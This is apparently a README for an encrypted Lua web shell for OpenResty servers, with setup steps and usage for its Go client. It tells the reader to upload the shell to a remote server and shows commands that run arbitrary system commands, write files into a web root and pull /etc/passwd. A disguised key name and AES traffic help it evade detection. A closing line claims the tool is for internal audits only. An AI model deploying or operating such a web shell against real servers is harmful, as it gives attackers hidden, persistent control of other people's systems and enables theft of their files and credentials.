Lua WebShell For OpenResty with AES encryption
1. Upload the server side script to remote server
aes = require("resty.aes")
str = require("resty.string")
rand = require("resty.random")
-- Change your encryption key here
template_name = "client_heartbeat"
2. Access the WebShell by using the client
$ go get -v # Pull the Golang dependencies
$ go run luaghost.go
-charset string
Access key (default "GBK")
-cmd string
Command to execute, or left it bank to upload a file
Download the remote file instead upload file
-file string
Local file you want to upload / saved
-key string
Access key
-rpath string
Remote file path (with the filename, C:\\1.txt etc, double backslash for Windows)
-url string
Target URL
For example, execute the command:
$ go run luaghost.go -url -key client_heartbeat -cmd "whoami"
Uploading file to remote server:
$ go run luaghost.go -url -key client_heartbeat -file ~/stage.lua -rpath "/var/www/html/stage.lua"
Downloading a file from remote server:
$ go run luaghost.go -url -key client_heartbeat -down -file /tmp/passwd -rpath "/etc/passwd"
This tool is used for internal security accessment && audit only. Please obey the laws of your country.